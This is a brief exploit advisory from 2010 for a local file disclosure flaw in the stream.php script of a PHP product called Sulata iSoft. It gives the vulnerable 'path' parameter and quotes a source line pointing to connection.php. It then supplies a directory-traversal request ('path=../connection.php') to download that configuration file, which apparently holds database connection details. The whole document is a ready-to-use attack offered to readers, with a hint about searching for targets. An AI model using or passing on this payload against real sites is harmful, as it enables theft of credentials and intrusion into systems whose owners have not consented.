Sulata iSoft (stream.php) Local File Disclosure Exploit
=========================================================
Sulata iSoft (stream.php) Local File Disclosure Exploit
=========================================================
# Exploit Title : Sulata iSoft (developer by Rizwan Azam) you look
site.com/about.php
# Date : 10 December 2010
# Author : Sudden_death
# Platform/Tested on: Windows XP 2 SP 2
# myweb : http://sudden.isgreat.org
# dork : your imagination
======================================================================
# vuln here
http://www.site.com/_admin/stream.php?path=
# try to download and watch source file stream.php
.....
//include_once("../home/library.php");
include_once("../connection.php"); <----------------------- look here,,
This is the config
suConnect();
.....
# after we know config, let us download
http://www.site.com/_admin/stream.php?path=../connection.php